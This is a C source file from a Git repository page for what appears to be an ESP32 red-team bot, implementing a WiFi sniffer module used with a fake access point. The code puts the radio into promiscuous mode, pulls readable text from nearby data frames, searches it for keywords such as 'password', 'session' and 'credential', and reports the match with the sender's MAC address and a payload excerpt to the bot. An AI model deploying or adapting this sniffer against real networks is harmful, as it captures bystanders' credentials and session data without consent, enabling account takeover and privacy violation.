Eun0us/espilon-source
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
main
espilon-source/espilon_bot/components/mod_fakeAP/mod_netsniff.c
Eun0us 6d45770d98 epsilon: merge command system into core + add 5 new modules 
Move command registry from components/command/ into components/core/.
New modules: mod_canbus, mod_honeypot, mod_fallback, mod_redteam, mod_ota.
Replace mod_proxy with tun_core (multiplexed SOCKS5 tunnel).
Kconfig extended with per-module settings and async worker config.
2026-02-28 20:07:59 +01:00

135 lines
3.4 KiB
C
Raw Permalink Blame History

#include "esp_wifi.h"
#include "esp_log.h"
#include <ctype.h>
#include <string.h>
#include <stdbool.h>
#include "fakeAP_utils.h"
#include "utils.h"
#include "event_format.h"
static const char *TAG = "MODULE_NET_SNIFFER";
/* ============================================================
* State
* ============================================================ */
static bool sniffer_running = false;
static uint32_t sniff_counter = 0;
/* ============================================================
* Helpers
* ============================================================ */
static void extract_printable(
const uint8_t *src,
int src_len,
char *dst,
int dst_len
) {
int j = 0;
for (int i = 0; i < src_len && j < dst_len - 1; i++) {
if (isprint(src[i])) {
dst[j++] = src[i];
}
}
dst[j] = '\0';
}
/* ============================================================
* WiFi callback
* ============================================================ */
static void wifi_sniffer_packet_handler(
void *buf,
wifi_promiscuous_pkt_type_t type
) {
if (!sniffer_running || type != WIFI_PKT_DATA)
return;
const wifi_promiscuous_pkt_t *pkt =
(const wifi_promiscuous_pkt_t *)buf;
const uint8_t *frame = pkt->payload;
uint16_t frame_len = pkt->rx_ctrl.sig_len;
if (frame_len < 36)
return;
const uint8_t *payload = frame + 24;
int payload_len = frame_len - 24;
if (payload_len <= 0)
return;
char printable[128];
extract_printable(payload, payload_len, printable, sizeof(printable));
if (!printable[0])
return;
const char *keywords[] = {
"password", "login", "username", "pass",
"email", "auth", "session", "credential",
"secret", "admin"
};
for (size_t i = 0; i < sizeof(keywords)/sizeof(keywords[0]); i++) {
if (strstr(printable, keywords[i])) {
if ((sniff_counter++ % 20) != 0)
return;
/* Extract source MAC from WiFi frame (addr2 = transmitter) */
char src_mac[18];
snprintf(src_mac, sizeof(src_mac),
"%02x:%02x:%02x:%02x:%02x:%02x",
frame[10], frame[11], frame[12],
frame[13], frame[14], frame[15]);
char detail[128];
snprintf(detail, sizeof(detail),
"keyword='%s' payload='%.64s'",
keywords[i], printable);
event_send(
"WIFI_PROBE", "MEDIUM",
src_mac, "0.0.0.0",
0, 0, detail, NULL
);
return;
}
}
}
/* ============================================================
* API
* ============================================================ */
void start_sniffer(void)
{
if (sniffer_running) {
msg_info(TAG, "Sniffer already running", NULL);
return;
}
sniff_counter = 0;
sniffer_running = true;
ESP_ERROR_CHECK(
esp_wifi_set_promiscuous_rx_cb(
wifi_sniffer_packet_handler
)
);
ESP_ERROR_CHECK(esp_wifi_set_promiscuous(true));
msg_info(TAG, "WiFi sniffer started", NULL);
}
void stop_sniffer(void)
{
if (!sniffer_running) {
msg_info(TAG, "Sniffer not running", NULL);
return;
}
sniffer_running = false;
ESP_ERROR_CHECK(esp_wifi_set_promiscuous(false));
msg_info(TAG, "WiFi sniffer stopped", NULL);
}
Reference in New Issue View Git Blame Copy Permalink